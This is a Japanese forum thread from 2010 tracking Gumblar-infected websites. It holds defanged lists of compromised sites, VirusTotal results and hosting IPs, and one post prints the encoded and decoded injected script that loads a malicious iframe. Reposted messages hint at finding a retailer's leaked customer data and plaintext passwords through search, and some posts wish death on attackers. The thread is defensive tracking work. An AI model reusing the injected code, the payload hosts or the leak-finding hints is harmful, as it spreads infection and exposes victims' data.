490:名無しさん@お腹いっぱい。
10/03/31 11:45:38
まさに老害

491:名無しさん@お腹いっぱい。
10/03/31 11:59:43
>>479のジジイは偉そうなことを言ってるが、いい歳して自分が無防備である愚かさに気づいてないな・

492:名無しさん@お腹いっぱい。
10/03/31 13:27:45
URLリンク(headlines.yahoo.co.jp)
日本のつぶやきでも起こりそうだよね・・・

493:名無しさん@お腹いっぱい。
10/03/31 14:12:23
若干スレチだけど、JREとIE5~8のアップデート来てます。


494:名無しさん@お腹いっぱい。
10/03/31 16:24:36
>>479の御老人・・・終わってますな。
ネット上からサイトごと消滅した方がいいと思う。

クリーンインストール前提で、必要なファイルのバックアップを取る為
「とりあえずマトモに動かせるようにする」と言う意味での
security tool削除ならわからなくもないが・・・
本体を殺してないのに「完全駆除」とは片腹痛いw


495:名無しさん@お腹いっぱい。
10/03/31 16:43:41
>>479
前半の日本語の意味が分からない
後半は驚いて何もいえない

496:名無しさん@お腹いっぱい。
10/03/31 17:41:55
>>479
こういうやつはウイルス流してるヤツらと同類だな
謝罪の為に首吊って死ぬべきだ
いや死ぬことすら生ぬるい

497:コテハン
10/03/31 21:21:10
【陥落サイトのURL悪用厳禁】
www●weekly-monthly●biz/

1件だけ投下・・・

498:名無しさん@お腹いっぱい。
10/03/31 21:47:14
URLリンク(www.weekly-monthly.biz)

499:名無しさん@お腹いっぱい。
10/03/31 22:29:20
>>497
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
>>497
電凸完了

500:名無しさん@お腹いっぱい。
10/03/31 22:32:45
>>497
もう対策されてるわ~。

501:名無しさん@お腹いっぱい。
10/04/01 03:28:17
12/40
URLリンク(www.virustotal.com)

07/37
URLリンク(www.virustotal.com)

502:コテハン ◆8080adndqg
10/04/01 11:31:03
【陥落サイトのURL悪用厳禁】
www●kadaru●mydns●to/ ←これやばくね?
www●jc-consulting●jp/ ←絶賛放置中
www●footsal-club●net/


503:コテハン ◆8080adndqg
10/04/01 11:40:22
「site:www●kadaru●mydns●to」
www●google●co●jp/search?hl=ja&source=hp&q=site%3Awww●kadaru●mydns●to&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
先生は絶賛スルー中...


504:コテハン ◆8080adndqg
10/04/01 13:23:51
【陥落サイトのURL悪用厳禁】
www●pokebai●net/



505:名無しさん@お腹いっぱい。
10/04/01 13:25:17
【陥落サイトのURL悪用厳禁】
vip.6to23.com/jogman←ビックリサイトのトップだが感染確認

506:コテハン ◆8080adndqg
10/04/01 14:29:59
>>505
"refresh"に5連発
.は●にしてほしいのです・・・
--
【陥落サイトのURL悪用厳禁】
www●ed-shop●com/
・Gumblarっぽいやつ
・<script>c10z27・・・
※めんどくさいから調べてない

ねる...

507:名無しさん@お腹いっぱい。
10/04/01 14:44:02
>>505
これはどこの記載で確認できるの?

508:名無しさん@お腹いっぱい。
10/04/01 16:53:55
ちょっと不便になるけどここまで来るとブラウザは常時仮想起動したほうがいいかな

509:名無しさん@お腹いっぱい。
10/04/01 17:36:24
>>508
ブラクラ専用ノート作れ

510:名無しさん@お腹いっぱい。
10/04/01 17:43:03
東原さんにガンブラーを話題にしてもらえば・・・

511:名無しさん@お腹いっぱい。
10/04/01 17:52:25
東原ウィルスが拡散すると聞いて

512:名無しさん@お腹いっぱい。
10/04/01 19:06:50
>>508
単純にJavascript切ればいいだけだアホ!

513:名無しさん@お腹いっぱい。
10/04/01 19:31:59
>>501
AviraとMSEは地雷か

514:名無しさん@お腹いっぱい。
10/04/01 20:20:00
>>512
そうNoScriptだな

515:名無しさん@お腹いっぱい。
10/04/01 20:52:56
>>512 >>514
そして.htaccessを改ざんするタイプに引っかかって感染、と・・・

516:名無しさん@お腹いっぱい。
10/04/01 21:09:49
.htaccessなんて表示されないのにどうやって防ぐのかと・・・

517:名無しさん@お腹いっぱい。
10/04/01 21:51:17
リダイレクトを全遮断して、リダイレクト先を確認するようにすればいいだろう。
煩わしさが半端ないから、よほど意志が強くない限りは続けられないと思うが。

518:名無しさん@お腹いっぱい。
10/04/01 22:36:46
>>517
まさにそれやってるけど大して煩わしさ感じない
そんなにリダイレクトしまくりなのか?

519:名無しさん@お腹いっぱい。
10/04/01 22:43:37
13/42
URLリンク(www.virustotal.com)

kenichikaki●com
スタパン涙目

>>502
URLリンク(www.virustotal.com)
トレンドマイクロだと?

520:519
10/04/01 22:51:30
すまん、スクリプトが中途半端だったorz

10/42
URLリンク(www.virustotal.com)

521:名無しさん@お腹いっぱい。
10/04/01 23:21:24
なるほど、その通り。
URLリンク(blog.f-secure.jp)

522:名無しさん@お腹いっぱい。
10/04/01 23:43:20
>>506
297B646F63756D656E742E777269746528756E65736361
7065282027253363253639253636253732253631
253664253635253230253665253631
253664253635253364253633253331
253330253230253733253732253633253364253237253638253734253734253730253361
253266253266253337253337253265253332253332253331

){document.write(unescape( '%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%31%30%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%37%37%2e%32%32%31

<iframe name=c10 src='URLリンク(77.221)

523:名無しさん@お腹いっぱい。
10/04/01 23:47:45
>>522んで
URLリンク(safeweb.norton.com)

524:名無しさん@お腹いっぱい。
10/04/01 23:59:11
MSEはGumblarに無力なのか・・・

525:名無しさん@お腹いっぱい。
10/04/02 00:09:41
つか、>>2がきちんとできていればGumblarの方が無力なんだよ。

526:名無しさん@お腹いっぱい。
10/04/02 01:46:30
いまグーグルキャッシュでメッセサンオー個人情報流出中で
2ch中が祭り状態だけどこれウイルス?
それともメッセの会社としての管理問題?
とにかく名前、TEL、メアドと大変だ

527:名無しさん@お腹いっぱい。
10/04/02 02:21:30
>>526
流出の原因はシス管がうんこだから

528:名無しさん@お腹いっぱい。
10/04/02 03:34:07
>>526
見たら近所の奴がいたw

529:名無しさん@お腹いっぱい。
10/04/02 04:20:36

489 :名無しさん必死だな:2010/04/02(金) 04:14:02 ID:cjzI0flq0
319 名前: 厚揚げ(関東地方) 投稿日:2010/04/02(金) 03:53:06.39 ID:7g2sF8Sk
購入履歴のページもやばいが、ある語句をつけて検索すると、
会員ごとの個人情報を直接編集する「管理者向けページ」が山のように出てくる。
客から、住所変更の依頼を受けたときなんかに使うページなんだろう。
これをGoogleさまが、ご丁寧に全ページをキャッシュしている。

このページは、会員が自分で決めたパスワードがソースの中に丸出しになってるから、
平文のパスワードが個人情報とセットで流出・・・こりゃ前代未聞の流出事件じゃないか?

ていうか大前提として、客が入力した大切なパスワードを、平文で保存しちゃダメだろ。

エログッズの買ったものリスト、住所、氏名、電話、性別、生年月日、
自分で決めたパスワードがセットで流出って、被害甚大すぎるだろ・・・

被害者は、1秒でも早く、ネットで共通で使っているパスワードを変えるべき。

530:名無しさん@お腹いっぱい。
10/04/02 04:25:15
496 :名無しさん必死だな:2010/04/02(金) 04:16:34 ID:cjzI0flq0
>>489の続き
さらに、ある文字列で単純にGoogle検索するだけで、
買い物かごシステムの管理者用設定変更ページが、検索結果の1番目に出てくる。
これはシステム上のトップレベルの権限だから、ディレクトリから何まですべての設定が参照できてしまう。

しかも、設定ファイルの置き場所も問題で、会員情報の全員分っぽい大元のCSVファイルと
ロックファイルが、public_htmlの下にまるだしで、URLさえ知ったら誰でもアクセスできる場所に
置いてあるし。いくらなんでも最低レベルだ・・・ザルすぎだろ・・・

俺はアクセスしなかったが、csvは、ちゃんとhtaccessで制限かけてあるんだろうな?
万が一、かけてなかったら・・・いったいどこのテストサイトだよ

531:名無しさん@お腹いっぱい。
10/04/02 05:27:41
ついにCSVファイル直リンURLが来てしまったようですよ

532:名無しさん@お腹いっぱい。
10/04/02 10:54:34
ん、ituneとQuickTimeの更新きてる
一応アップデートしとくか

533:名無しさん@お腹いっぱい。
10/04/02 11:37:34
Appleは29日に88個のパッチが来てる
URLリンク(blog.f-secure.jp)

534:名無しさん@お腹いっぱい。
10/04/02 12:30:04
88個・・・
狂気だろw

535:名無しさん@お腹いっぱい。
10/04/02 12:41:07
>>524
Gumblar/8080
URLリンク(ec2-204-236-148-61.us-west-1.compute.amazonaws.com)

KatesKiller
URLリンク(support.kaspersky.co.jp)

この2点でチェックだけでいいよな。>>1テンプレ次は修正すべき。

536:名無しさん@お腹いっぱい。
10/04/02 12:46:46
>>534
それでもこっちよりはマシw
URLリンク(blog.f-secure.jp)

537:名無しさん@お腹いっぱい。
10/04/02 13:56:54
URLリンク(www.kakiko.com)

538:名無しさん@お腹いっぱい。
10/04/02 14:36:21
>>536
Foxit Reader 3.2.1.0401で対応
警告ダイアログが出るようになった

539:名無しさん@お腹いっぱい。
10/04/02 16:16:21
メッセサンオーもGumblarにやられたのか・・・

540:名無しさん@お腹いっぱい。
10/04/02 16:23:23
関係ないだろ

541:名無しさん@お腹いっぱい。
10/04/02 17:46:41
現在大学4年で就活中なわけだが、最近は企業の事業紹介サイトもガンブラに侵されてたりするから困る
求人サイトからURLを踏む前にチェック入れるのが手間すぎる

542:名無しさん@お腹いっぱい。
10/04/02 17:57:25
>>541
>>2

543:名無しさん@お腹いっぱい。
10/04/02 18:22:01
つーかさあ…ガンブラ撒いてるクズは
さっさと捕まるか殺されるか自殺しとけよ
捕まったら死刑じゃすまねぇからな


544:名無しさん@お腹いっぱい。
10/04/02 18:49:43
はいw

545:名無しさん@お腹いっぱい。
10/04/02 18:52:29
>>543
バカなのはわかったからとっとと>>2読め

546:名無しさん@お腹いっぱい。
10/04/03 03:53:19
個人だったらSecunia Personal Software Inspectorでアップデートすればかんたん
URLリンク(www.forest.impress.co.jp)

547:コテハン ◆8080adndqg
10/04/03 14:56:46
【陥落サイトのURL悪用厳禁】
www●mog-mmy●com/
www●ichiryuimono●com/
www●cashingalliance●com ←作りかけ放置?
※コードが途中で切れてるけど、いちおう...
www●tirashi●jp/ ←再掲載(絶賛放置中)
kadaru●mydns●to/tauchi-office/taikensyugi/ ←再掲載(絶賛放置中)
※kadaru●mydns●to/以下が全滅?


548:コテハン ◆8080adndqg
10/04/03 18:29:48
【陥落サイトのURL悪用厳禁】
www●babys-b●com/


549:名無しさん@お腹いっぱい。
10/04/03 19:00:12
そういやxreaのユーザー掲示板にwebmaster復活してるんだが
今アドレス送って掲示板に書き込めば403とか対処してくれるかも

550:名無しさん@お腹いっぱい。
10/04/03 22:24:48
>>547
作りかけワロタwww
作者めまたやってくれましたな

551:名無しさん@お腹いっぱい。
10/04/03 22:26:33
そういや最近カスペの検出力が落ちてないか?んでトレンドマイクロが上がって来たという
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
URLリンク(www.virustotal.com)
avast 4/4
Kaspersky 0/4
TrendMicro 3/4

552:名無しさん@お腹いっぱい。
10/04/04 01:52:23
>>551
avast使いの人は検体送付してるよ(現に俺がそうだし)
キミがカスペ使いなら以下の検体を送付しる!
スレリンク(sec板:473番)

553:コテハン ◆8080adndqg
10/04/04 03:55:26
ねむい・・・

【陥落サイトのURL悪用厳禁】
www●okjdr●com/
www●oracle-shop●net/


554:名無しさん@お腹いっぱい。
10/04/04 21:23:10
これもっぽいな
www●golazo●jp/

555:名無しさん@お腹いっぱい。
10/04/04 21:42:03
>>554
確認すた>>523だぬ。。。

556:名無しさん@お腹いっぱい。
10/04/04 21:48:33
チェッカーのサイト落ちてる?

557:名無しさん@お腹いっぱい。
10/04/04 21:57:25
>>555
情報thxです
最近の傾向についていけてなかったんで自分で見てもわからなかったわ
aguse GWでなぜかyahoo●comのフレームが見えたのがそれのダミーだったんだね

558:名無しさん@お腹いっぱい。
10/04/04 22:04:43
>>557
今の時点(こちらの環境)ではTOPのindexじゃなくて、他のindexが…
例: Last-Modified: Sun, 04 Apr 2010 03:34:43 GMT :  i/index.html

c767c●c2>2w1>●61>5_3>●w1w7>8c/_g_o_2>/wicn6●wp6h>pw’.bZ(/[w¥>_6c]/g, ’

77●221●153●178/go2/in●php

559:名無しさん@お腹いっぱい。
10/04/04 22:16:48
>>558
なるほろthxです
<!-- ad -->になごんだ

しかしこっちもaguse GWだと見た目はyahoocomのフレームだね

560:名無しさん@お腹いっぱい。
10/04/04 22:20:38
GENOウイルス?への誘導レスに注意
スレリンク(news板)

こんな馬鹿もいるんだねw

561:名無しさん@お腹いっぱい。
10/04/04 22:23:54
>>559
jsファイルに弄った跡がなさそうなのとtopのindexにはヤホー米やらなんやらと思ったらaguseでとtopにも>>523出たお。。。

562:名無しさん@お腹いっぱい。
10/04/04 22:33:33
バックナンバーのindexにあるのも確認しました
トップは拾えないなあ

563:名無しさん@お腹いっぱい。
10/04/04 22:43:52
やっとトップわかった!
/mado/か!
>>561さんthxですた

564:コテハン ◆8080adndqg
10/04/05 14:34:45
面白いのがきましたよ~

【陥落サイトのURL悪用厳禁】
デジタルアソシエーション株式会社
www●digital-as●co●jp/
\(^o^)/オワタ

565:名無しさん@お腹いっぱい。
10/04/05 14:40:35
> ネットワーク分野においては、ますます重要視されるセキュリティーの問題を含め、
> ネットワークシステムの構築から開発、保守、運用に至るまで確実に進めて参ります。
> 常に、新しい技術を活用するに留まらず、経験あるスペシャリストが業務知識を十分駆使し、
> 課題の本質の調査、分析を徹底的に行うことから、始めます。

566:名無しさん@お腹いっぱい。
10/04/05 15:19:09
digital-as>める凸完了

567:名無しさん@お腹いっぱい。
10/04/05 15:51:31
こんな会社にシステムだのセキュリティだの語ってほしくないというのがみんなの総意だろうwwwww

>>566
凸おつ~

568:名無しさん@お腹いっぱい。
10/04/05 19:26:13
見に行ったら403 Forbiddenだった

569:コテハン ◆8080adndqg
10/04/05 19:45:38
>>568
ぐーぐる先生の「きゃっしゅ」にのこってる・・・

570:名無しさん@お腹いっぱい。
10/04/05 20:50:13
>>569
ついにセキュリティ関連企業までやられましたか
やれやれ

571:名無しさん@お腹いっぱい。
10/04/05 22:07:48
>>564
再感染か修正漏れかしらないけれどダメだこりゃ。
www●digital-as●co●jp/service/index●html


572:名無しさん@お腹いっぱい。
10/04/05 22:40:48
>>571
特に何ともないようだが

しかしトップページには何も告知が無い…さすがに出せないか

573:名無しさん@お腹いっぱい。
10/04/05 22:59:27
>>572
/shared/openwin.js
URLリンク(www.virustotal.com)

574:名無しさん@お腹いっぱい。
10/04/05 23:14:59
>>573
もう修正されてるお。
Last-Modified: Mon, 05 Apr 2010 11:44:28 GMT

575:571
10/04/05 23:16:41
>>572
いま行ったら消えてた。
「人間性を備えた技術集団」を目指すと、改竄は告知なしのこっそり修正になるのか。
胸が熱くなるな。

576:名無しさん@お腹いっぱい。
10/04/05 23:49:53
まだある
Firefoxでwww●digital-as●co●jp/service/index●html
ソースの14行目の/shared/openwin.jsをクリック
ページをコピペしてvirustotalに投げてみそ

577:名無しさん@お腹いっぱい。
10/04/05 23:59:26
>>576
URLリンク(www.kakiko.com)
URLリンク(rd.or.tp)
URLリンク(www.dan.co.uk)

キャッシュじゃにゃいのか?

URLリンク(online.us.drweb.com)
>>573の修正後なぬで緑

578:名無しさん@お腹いっぱい。
10/04/06 00:16:17
>>577のVTの結果

誰かが投げたの
URLリンク(www.virustotal.com)
File openwin.js received on 2010.04.05 14:19:48 (UTC)
Result: 0/39 (0.00%)

今、漏れが投げたの
URLリンク(www.virustotal.com)
File openwin.js received on 2010.04.05 15:09:07 (UTC)
Result: 0/39 (0%)

>>573はヒゲおじさんから次のうpだてで「Trojan.JS.Redirector.bt」だおって返事きてた。
かすぺユーザーは確認よろ。(VTは更新が遅いから)

579:576
10/04/06 01:01:28
>>577
別PCで見たらなかったにゃ

580:名無しさん@お腹いっぱい。
10/04/06 01:13:33
>>579
ノシ

時間も経ってるしとりあえず投げてみた。
URLリンク(www.virustotal.com)
File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
Result: 5/39 (12.82%)

まだ、更新されてないのね。

581:名無しさん@お腹いっぱい。
10/04/06 01:15:57
>>580
× File www.digital-as.co.jp.openwin.js received on 2010.04.05 08:39:19 (UTC)
○ File www.digital-as.co.jp.openwin.js received on 2010.04.05 16:03:49 (UTC)

582:名無しさん@お腹いっぱい。
10/04/06 01:18:59
念のため
URLリンク(www.virustotal.com)
File www.digital-as.co.jp.index.html received on 2010.04.05 08:21:22 (UTC)
Result: 7/39 (17.95%)

URLリンク(www.virustotal.com)
File www.digital-as.co.jp.index.html received on 2010.04.05 16:12:05 (UTC)
Result: 7/39 (17.95%)

583:名無しさん@お腹いっぱい。
10/04/06 01:32:58
相変わらずavastは頑張ってますな
ありがたやありがたや

584:名無しさん@お腹いっぱい。
10/04/06 02:19:15
digital-as●co●jp中の人がスレに常駐してたっぽいなw
こんなところを見てる暇があったら「告知(お詫び)」書け。

■サイト改ざん(1)「告知せず」で感染拡大の恐れ~負の連鎖を断ち切るために
URLリンク(www.so-net.ne.jp)
>改ざんされたサイトを閲覧し、不幸にもウイルスに感染してしまった人たちは、
あなた方が知らせなければ、今も感染に気付かないままでいる可能性が高いのだ。
>Webサイトの管理者や運営者の方たちは、できるだけ迅速に改ざんされていた期間と場所を告知し、
この負の連鎖を断ち切れるよう尽力いただきたい。

■インシデント報告の届出(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
報告もしろよ>digital-asの糞シス管

585:名無しさん@お腹いっぱい。
10/04/06 03:19:03
>>584
>>566さんとは別に漏れもめるぽした時にセキュリティ通信のそのアドレスも含めて送ったお。
toで同時に送ったCPIからは返事きてた。
JPCERT/CCにはccで同時に送ったお。

デジタルアソシエーション 株式会社 にはせめてIPAに自社のホームページが改竄を受けてトロイをばら撒いていたことを自己申告してほしい。


   γ⌒ヽ
  < ・、,,,;;,)      ハ,,..,,ハ
  < つ=つ     /;;・ω・;;ヽ
  ノ   ノ三)     (;( ^^^ );)
∠、 m)=m)       `'ー---‐´


いかんな、もう修正されたしいい加減スルーするとこだけど>>565だからなぁ…

586:名無しさん@お腹いっぱい。
10/04/06 04:37:15
>>585
【主な取引先】
NECシステムテクノロジー株式会社
株式会社NTTデータアウラ
株式会社NTTデータ関西
株式会社大阪第一食糧
京セラ コミュニケーションシステム株式会社
スミセイ情報システム株式会社
住友化学システムサービス株式会社
デジタルプロセス株式会社
ニッセイ情報テクノロジー株式会社
日本電話施設株式会社
パナソニックAVCマルチメディアソフト株式会社
株式会社日立システムアンドサービス
株式会社富士通九州システムズ
富士通テン株式会社
富士電機ITセンター株式会社
三井情報株式会社
安川情報システム株式会社

日本アイ・ビー・エム株式会社
みずほ銀行
三井住友銀行
りそな銀行


上記の企業を相手に商売してて「逃げ(告知無し)」がバレたら
倒産フラグ成立間違いなしだろうなw


587:名無しさん@お腹いっぱい。
10/04/06 04:47:17
>>586
( ゚∀゚)アハハ八八ノヽノヽノヽノ \ / \/ \

URLリンク(www.nca.gr.jp)
ここの会員でJPCERT/CCから情報の共有があって、関連会社との連携が深ければ ぁぅぁぅ

588:名無しさん@お腹いっぱい。
10/04/06 09:46:26
>>586
どうせ特定派遣で人材出してるだけだろうから
派遣されてるヤツが派遣先で問題起こしたとかじゃなければあんまり影響ないよ。
取引先のWebサイトとかを制作してたとか、
顧客のPCをGumbler攻撃で感染させちゃったとかなら契約切られる可能性もあるが…



589:名無しさん@お腹いっぱい。
10/04/06 11:46:37
銀行系にはそんなずさんな企業と取引があることが
信用不安になるからそれなりに効果ありそうだけどね。

590:名無しさん@お腹いっぱい。
10/04/06 11:51:42
釈明報も掲示しないで隠蔽しようとする会社って…

591:名無しさん@お腹いっぱい。
10/04/06 12:02:14
銀行は単に融資を受けてるだけじゃねw
融資銀行だって取引先に書くだろうし、この程度で信用不安になるなら
もっとマスコミが騒ぎ立てるだろ…

592:コテハン ◆8080adndqg
10/04/06 12:56:51
【陥落サイトのURL悪用厳禁】
中途半端なコード撤去、再改竄、絶賛放置中とか・・・
posh-e●com/index10●htm
pacific-staff●net/
hoikuen●19th●org/
cre2cash●2pg●in/ ←朝日オート(sunrise●2pg●in/)と同じく<!--<script>-->


593:名無しさん@お腹いっぱい。
10/04/06 13:00:55
>>592
コメントアウトとかアホな対応してるな…

594:名無しさん@お腹いっぱい。
10/04/06 13:26:54
> <!--<script>-->
これって一応、無効化してるんだ

595:名無しさん@お腹いっぱい。
10/04/06 19:22:28
>>592
醤油みてる最中だけど新型?
> hoikuen●19th●org/
bestdarkstar●info:8080

596:名無しさん@お腹いっぱい。
10/04/06 19:32:58
自己レス
91.121.117.37
gnomeさんとこで確認すた。。。

597:名無しさん@お腹いっぱい。
10/04/06 19:34:59
94.23.159.128になった。
これもgnomeさんとこで確認

598:名無しさん@お腹いっぱい。
10/04/06 19:43:41
>>592
あーーっ!
> hoikuen●19th●org/

URLリンク(bestdarkstar)●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php

.info 浸食


599:名無しさん@お腹いっぱい。
10/04/06 19:43:52
</script><noscript><div style="position:absolute;">
<img width=1 height=1 alt="" src="URLリンク(b3.yahoo.co.jp)
FBGG7XxTw7GuMbELS3k.QhJAeWYvBUu7D_gAAyR9&T=13vm0jrtv%2fX%3d1270
550520%2fE%3d2079744651%2fR%3djp_r25%2fK%3d5%2fV%3d3.1%2fW%3dJ%2fY
%3djp%2fF%3d3785814215%2fQ%3d-1%2fS%3d1%2fJ%3d52C3537C"></div></no
script>
これは?

600:名無しさん@お腹いっぱい。
10/04/06 20:00:10
>>595
かぶった

>>597
いまはこの5個セット
195.160.200.36 GB:AS44949 (GIGACODES)
77.241.93.114 BE:AS34762 (COMBELL)
91.121.117.37 FR:AS16276 (OVH)
91.121.169.6 FR:AS16276 (OVH)
94.23.159.128 FR:AS16276 (OVH)

OVH死ねよ

601:名無しさん@お腹いっぱい。
10/04/06 20:06:28
>>599

ビーコン用GIFかな

602:名無しさん@お腹いっぱい。
10/04/06 20:37:10
>>592
sunrise●2pg●inも変わってる
-> snoreflash●ru:8080

603:名無しさん@お腹いっぱい。
10/04/06 20:44:20
2pg●in消えたっぽい?
>>602ソースアーカイブでけんかった。。。orz....

604:コテハン ◆8080adndqg
10/04/06 21:28:33
>>595-603
天然で新型を引っ張ってたみたいだぬ(苦笑)


605:名無しさん@お腹いっぱい。
10/04/06 21:55:01
>>598
.ruドメイン管理厳格化の影響だな
次は.infoか…

606:名無しさん@お腹いっぱい。
10/04/06 22:10:45
>>564-591
【お詫び】ホームページ改ざん被害について
Last-Modified: Tue, 06 Apr 2010 12:53:17 GMT URLリンク(www.digital-as.co.jp)

607:名無しさん@お腹いっぱい。
10/04/06 22:23:39
>>606
これ、説明として正しいのか?
自分とこの管理用PCが感染して、それでサイト更新しただけだろ?

608:名無しさん@お腹いっぱい。
10/04/06 22:38:51
本当に管理用PCだけが感染してたかはわからんしな
他にもあるんじゃなかろうか

まあでも一応不正アクセスではあるんじゃね
広義では、管理者の意図しないアクセス=不正アクセスらしいからな

609:名無しさん@お腹いっぱい。
10/04/06 23:00:32
やはりOS再インストールしろとは書かないのね…

610:名無しさん@お腹いっぱい。
10/04/06 23:22:46
書けないでしょね。。。



>>573-582あたりの続き

URLリンク(www.virustotal.com)
File www.digital-as.co.jp.openwin.js received on 2010.04.06 14:16:37 (UTC)
Result: 7/38 (18.43%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
GData 19 2010.04.06 JS:Illredir-AL
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AB
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB

URLリンク(www.virustotal.com)
File www.digital-as.co.jp.index.html received on 2010.04.06 14:12:34 (UTC)
Result: 11/39 (28.21%)
Avast 4.8.1351.0 2010.04.06 JS:Illredir-AL
Avast5 5.0.332.0 2010.04.06 JS:Illredir-AL
BitDefender 7.2 2010.04.06 Trojan.JS.Clicker.ABW
DrWeb 5.0.2.03300 2010.04.06 JS.Redirector.based.2
F-Secure 9.0.15370.0 2010.04.06 Trojan.JS.Clicker.ABW
GData 19 2010.04.06 Trojan.JS.Clicker.ABW
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
Kaspersky 7.0.0.125 2010.04.06 Trojan.JS.Redirector.bt
NOD32 5004 2010.04.06 JS/TrojanDownloader.Pegel.AA
nProtect 2009.1.8.0 2010.04.06 Trojan.Script.397566
Sophos 4.52.0 2010.04.06 Troj/JSRedir-BB

611:名無しさん@お腹いっぱい。
10/04/06 23:25:29
んで>>595-603あたりでやった分

URLリンク(www.virustotal.com)
File hoikuen.19th.org.html received on 2010.04.06 12:26:55 (UTC)
Result: 2/39 (5.13%)
Jiangmin 13.0.900 2010.04.06 Trojan/JS.Pegel.a
NOD32 5003 2010.04.06 JS/TrojanDownloader.Pegel.AA

ソースだけにしたブツ
URLリンク(www.virustotal.com)
File 19th.org.txt received on 2010.04.06 12:31:28 (UTC)
Result: 0/39 (0%)

612:名無しさん@お腹いっぱい。
10/04/06 23:34:57
>>610
avast以外のフリー系には期待出来んな

613:名無しさん@お腹いっぱい。
10/04/06 23:39:46
>>612
得手不得手があるよ
Gumblar.xだとAVGがよかったりする。
>>611はほぼ全滅なぬで国ドメイン(IPアドレス)変えただけでも脅威になるのね。。。
個人的にイパーイ検体出してるけどユーザーじゃないから届いてないかもしれにゃい。。。orz.....

614:名無しさん@お腹いっぱい。
10/04/06 23:47:08
>>613
メールなら関係ないと思う
俺はユーザーだけどメールで検体出してるし、2回ほど返事が来たこともある
まぁavastはめったに返事来ないがな

615:名無しさん@お腹いっぱい。
10/04/06 23:47:23
>>606
>2. 不正アクセスにより改ざんされた対象期間
2010年3月25日(木)6:00 ~ 2010年4月5日(月)23:00

>>564 :コテハン ◆8080adndqg :2010/04 /05(月) 14:34:45
ここに投下されて凸られるまで「気づかなかった」としたら最悪だなwww

616:名無しさん@お腹いっぱい。
10/04/06 23:57:13
>>614
AVGはツンデレ(死語)でねぇ、一度も返事がなかったんだけど
解パス間違えて送ったら、パス合わねぇーって返事北。
同時に出したかすぺはパス解読して対応の返事北。w

>>615
注意:醤油に反応する場合があります。
Last-Modified: Thu, 01 Apr 2010 13:17:22 GMT : URLリンク(megalodon.jp)
多分気づかなかったんですね

617:名無しさん@お腹いっぱい。
10/04/07 00:04:58
>>616
1回は検体提出感謝の返事がスペルミス付きで来たw
1回は添付忘れて送ったら、4日後に「添付がねぇ」ってサポートからメール来た

618:名無しさん@お腹いっぱい。
10/04/07 00:08:09
>>617
みんなやっちゃうなぁw

ここんとこパス合ってるけど圧縮ファイル名間違えて送ること数回。
顰蹙買い捲ってそうです><

619:名無しさん@お腹いっぱい。
10/04/07 10:19:02
>>615
期間長っ! 終わってるな・・・

620:名無しさん@お腹いっぱい。
10/04/07 10:30:36
>>612
スクリプトが検知できないから期待できないと言うのは早漏だろ。
スクリプトを踏んだ時点で検知できればそれに越したことはないが
肝心なのは現物がDLされる前に検知できるかであって
検知できれば結果は同じことだ。


その現物を持っていないから検知できるか知らんけどね。

621:名無しさん@お腹いっぱい。
10/04/07 14:23:39
bestdarkなんとか踏んだ時にJava6アップデート19(ビルド 1.6.0_19-b04)のアイコンがタスクトレイに表示されたんだけど、これ感染してるんでしょうか?
>>2はやってるはず。adobe readerは半年以上前にアンインストールしてある

622:コテハン ◆8080adndqg
10/04/07 14:29:24
重複してるのはぢめて見た・・・

【陥落サイトのURL悪用厳禁】
www●jc-consulting●jp/ ←絶賛放置中

hXXp://bestdarkstar●info:8080/google●com/blogcatalog●com/orbitdownloader●com●php
コードは>>598と同じなんだけど・・・
<!--562ba23ffcf28efa4f71fc787258d3d3-->
<!--e62178df1fa90a28d1b2efa8443ab220-->
謎の文字列が謎...

623:名無しさん@お腹いっぱい。
10/04/07 14:29:33
はずじゃなんとも言えませんなあ
心配ならOS入れなおし推奨

624:名無しさん@お腹いっぱい。
10/04/07 14:31:48
このスレで質問しても無駄だぜ
「感染してるかもと思ったんならクリーンインストールしろ!」で終わりだから

実際それが一番確実だろうしな

625:名無しさん@お腹いっぱい。
10/04/07 14:32:37
info:8080の拡散が始まった?
URLリンク(www.aguse.jp)

at:8080
URLリンク(www.aguse.jp)

やばいねー

626:名無しさん@お腹いっぱい。
10/04/07 14:36:57
引き続き*:8080/をブロックでおkかな?

627:コテハン ◆8080adndqg
10/04/07 14:49:44
【陥落サイトのURL悪用厳禁】
www●toutyann●com/

hXXp://snoreflash●ru:8080/360-cn/google●com/thesun●co●uk●php

また重複しとる...

628:名無しさん@お腹いっぱい。
10/04/07 15:01:26
>>626
いいんじゃね。
8080全弾きは誤爆するという奴もいるけど、そんな事例見たことないし。

629:コテハン ◆8080adndqg
10/04/07 15:03:56
>>625
hXXp://helphomecare●at:8080/ultimate-guitar-com/google●com/livedoor●biz●php
at:8080/もでつか・・・ orz

>>626 *:8080/* ブロックでおk。
巻き込みで阻止られるサイトはURLが悪い(笑)

630:名無しさん@お腹いっぱい。
10/04/07 15:12:04
仮に :8080/ がアドレスに含まれる真っ当なサイトがあったとしても、そのときは一時的に
ブロックを解除すればいいだけだしな。

631:名無しさん@お腹いっぱい。
10/04/07 16:37:19
URLリンク(rd.or.tp)

URLリンク(rd.or.tp)

> Found iFrame!
誤検出かな?

632:名無しさん@お腹いっぱい。
10/04/07 16:49:11
>>631
上: 269, 270
下: 1053, 1054

にそれぞれ<iframe></iframe>があるぜぃ

633:名無しさん@お腹いっぱい。
10/04/07 16:52:31
Avira10premium使ってみたがwebリダイレクトは問答無用でブロック。
offにするにはwebGuardを無効にするしかない。i-frameに対する設定は出来る。
なんでもクリックするヤツには良いかもしれん。

634:名無しさん@お腹いっぱい。
10/04/07 17:48:38
>>631
jde-net●co●jp センセイの診断結果
>このウェブサイトにアクセスするとコンピュータに損害を与える可能性があります。

センセイ激怒中w

>>633
